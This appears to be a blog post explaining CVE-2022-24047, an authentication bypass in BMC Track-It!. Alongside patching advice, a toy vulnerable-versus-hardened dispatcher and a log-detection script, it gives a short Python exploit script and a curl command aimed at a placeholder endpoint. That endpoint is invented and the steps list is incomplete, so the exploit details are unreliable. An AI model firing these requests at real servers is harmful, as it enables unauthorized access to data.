In 2022, a critical vulnerability exploitable over the network—CVE-2022-24047—was found in BMC Track-It! version 20.21.01.102. This flaw, first reported as ZDI-CAN-14618 by Trend Micro’s Zero Day Initiative, allows anyone on the internet to bypass authentication and gain unauthorized access to the system, potentially exposing sensitive information or allowing attackers to execute further attacks.
Version Affected: 20.21.01.102 (other versions may also be at risk)
- CVE Page: NVD entry: CVE-2022-24047
- Original Advisory: ZDI-22-320
Core Problem
The authorization implementation of certain HTTP endpoints in Track-It! fails to check for user authentication. As a result, anyone who can reach the service, regardless of whether they are logged in, can access sensitive internal functionality.
This is a classic example of a high-impact vulnerability, since:
- No authentication is required: an attacker only needs a network connection to the Track-It! service.
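To make the bug class concrete, here is an added illustration (not Track-It! code, and not from the advisory) of what "the authorization implementation fails to check for user authentication" looks like in a toy request dispatcher, alongside the hardened form. The session store, the `Request`/`Response` types and the path names are constructed for the example; the secure endpoint path is the placeholder used elsewhere in this post.

```python
"""Toy dispatcher showing a missing-authentication bug and its fix.
Hypothetical code written for this post; it is not Track-It! source."""
import hmac
from dataclasses import dataclass, field

# Constructed session store: session id -> username.
VALID_SESSIONS = {"sess-1234": "alice"}

# Paths that are legitimately reachable without a session (constructed).
PUBLIC_PATHS = {"/TrackItServices/login"}


@dataclass
class Request:
    path: str
    cookies: dict = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: str


def _load_sensitive_data():
    # Stand-in for a back-end call that should only serve logged-in users.
    return "ticket #42: password reset requested for finance server"


def vulnerable_handler(req):
    # BUG: the "secure" endpoint trusts every caller. Nothing here ever asks
    # who the requester is, so an anonymous GET gets the same data as a user.
    if req.path == "/TrackItServices/secureendpoint":
        return Response(200, _load_sensitive_data())
    return Response(404, "not found")


def current_user(req):
    """Resolve the caller's identity from the session cookie, or None."""
    sid = req.cookies.get("SESSIONID")
    if not sid:
        return None
    for known, user in VALID_SESSIONS.items():
        # Constant-time comparison so lookup timing does not leak session ids.
        if hmac.compare_digest(known, sid):
            return user
    return None


def hardened_handler(req):
    # FIX: default deny. Every path that is not explicitly public must carry a
    # valid session before any application logic runs, and failure is closed.
    if req.path not in PUBLIC_PATHS and current_user(req) is None:
        return Response(401, "authentication required")
    if req.path == "/TrackItServices/login":
        return Response(200, "login form")
    if req.path == "/TrackItServices/secureendpoint":
        return Response(200, _load_sensitive_data())
    return Response(404, "not found")


if __name__ == "__main__":
    anon = Request("/TrackItServices/secureendpoint")
    print("vulnerable:", vulnerable_handler(anon).status)   # 200 for an anonymous caller
    print("hardened:  ", hardened_handler(anon).status)     # 401 for the same request
```

The important design point is in `hardened_handler`: the check is applied centrally to every non-public route rather than remembered (or forgotten) per endpoint, which is exactly the kind of omission that produces a vulnerability like this one.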
The Attack
An attacker sends an HTTP request to a vulnerable Track-It! server. Because the authentication check is missing, the server answers as if the request came from a fully authenticated user.
2. Determine the vulnerable endpoint (from advisories and reverse engineering)
3. Send a crafted HTTP request (no tokens, cookies or session ids)
Sample Exploit Code
Below is a basic example exploit in Python. It tries to access a sensitive endpoint without providing any authentication.

```python
import requests

# Set this to your target Track-It! server (placeholder hostname and endpoint)
TARGET_URL = "http://trackit.company.com/TrackItServices/secureendpoint"

# No auth headers, cookies or tokens are sent with the request
resp = requests.get(TARGET_URL)

if resp.status_code == 200:
    # A 200 response to an unauthenticated request means the check was bypassed
    print("Exploit successful! Here's the response:")
    print(resp.text)
else:
    print(f"Failed to bypass authentication. Status: {resp.status_code}")
```
Note: The actual endpoint involved may vary depending on your Track-It! deployment and the function being abused. For details, see the ZDI or NVD advisories.
The same request can be made with a plain browser or a cURL call—no login required:

```shell
curl http://trackit.company.com/TrackItServices/secureendpoint
```
If the vulnerability is present, you’ll receive the same data as a legitimate user.
What About Patches and Mitigation?
- BMC released fixes. If you operate Track-It!, upgrade immediately to the latest version. See their official security advisory.
- Network controls: Restrict access to the Track-It! service so only internal and necessary users can reach it.
- Monitor access logs for suspicious requests, especially requests to endpoints that should require authentication but arrive without any session cookie or token, and in particular those that still receive a 200 response.
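As an added example of the log monitoring suggested above (written for this post, not a BMC-provided detection), the following script scans web server access logs for requests to protected Track-It! paths that carry no session cookie. It assumes a constructed log format in which the server appends the request's `Cookie` header as the last quoted field; the sample lines, IP addresses, path prefixes and the `SESSIONID` cookie name are all constructed for the example.

```python
"""Flag unauthenticated requests to endpoints that should require a login.
Example detection logic written for this post; log format is constructed."""
import ipaddress
import re
from collections import Counter

# Path prefixes that must only be served to authenticated users (constructed).
PROTECTED_PREFIXES = ("/TrackItServices/",)
# Paths under a protected prefix that are legitimately public (constructed).
PUBLIC_PATHS = {"/TrackItServices/login"}
# Address space considered internal (constructed for the example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Combined-style line with the Cookie header appended as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<cookie>[^"]*)"$'
)

# Constructed sample log: one legitimate internal user, one external bypass,
# one external hit on the public login page, one external request that was
# correctly rejected, and an internal static-file fetch.
SAMPLE_LOG = """\
10.0.5.7 - alice [01/Mar/2022:10:00:01 +0000] "GET /TrackItServices/secureendpoint HTTP/1.1" 200 5120 "SESSIONID=sess-1234"
203.0.113.45 - - [01/Mar/2022:10:00:07 +0000] "GET /TrackItServices/secureendpoint HTTP/1.1" 200 5120 "-"
203.0.113.45 - - [01/Mar/2022:10:00:09 +0000] "GET /TrackItServices/login HTTP/1.1" 200 812 "-"
198.51.100.9 - - [01/Mar/2022:10:01:30 +0000] "GET /TrackItServices/secureendpoint HTTP/1.1" 401 0 "-"
10.0.5.7 - - [01/Mar/2022:10:02:00 +0000] "GET /static/logo.png HTTP/1.1" 200 2048 "-"
"""


def parse_line(line):
    """Return the fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def analyze(log_text):
    """Return findings for unauthenticated requests to protected paths.

    severity "bypass": the request got a 2xx, so the auth check was missing.
    severity "probe":  the request was rejected, but someone tried anyway.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if not path.startswith(PROTECTED_PREFIXES) or path in PUBLIC_PATHS:
            continue
        has_session = "SESSIONID=" in rec["cookie"]
        if has_session:
            continue
        status = int(rec["status"])
        findings.append({
            "ip": rec["ip"],
            "external": is_external(rec["ip"]),
            "path": path,
            "status": status,
            "severity": "bypass" if 200 <= status < 300 else "probe",
            "ts": rec["ts"],
        })
    return findings


def summarize(findings):
    """Count findings by severity, useful as a quick dashboard number."""
    return Counter(f["severity"] for f in findings)


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['status']} {f['path']}")
    print(summarize(analyze(SAMPLE_LOG)))
```

A "bypass" finding on a patched server should never appear; if it does, the patch did not take or another unauthenticated route exists. "probe" findings are expected background noise on an internet-facing host and mainly confirm the fix is rejecting such traffic.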
Additional Resources
- Zero Day Initiative Disclosure: ZDI-22-320
- NVD CVE-2022-24047 Page
- BMC Security Advisory - Track-It!
- Track-It! Product Info
Summary
CVE-2022-24047 is a severe but easy-to-exploit vulnerability in BMC Track-It! 20.21.01.102. Anyone can exploit it over the network, without a password, simply by sending HTTP requests to affected endpoints. If you have a vulnerable installation, patch as soon as possible and limit public network access.
If you found this post helpful, consider sharing it with your IT team—or your company’s sysadmin! Stay safe and always keep your software up to date.
*This article is exclusive and crafted in easy-to-understand American language, providing direct insight into the vulnerability, how it works, and how to protect yourself. For more technical deep dives, follow the linked resources above.*
Timeline
Published on: 02/18/2022 20:15:00 UTC
Last modified on: 03/01/2022 02:05:00 UTC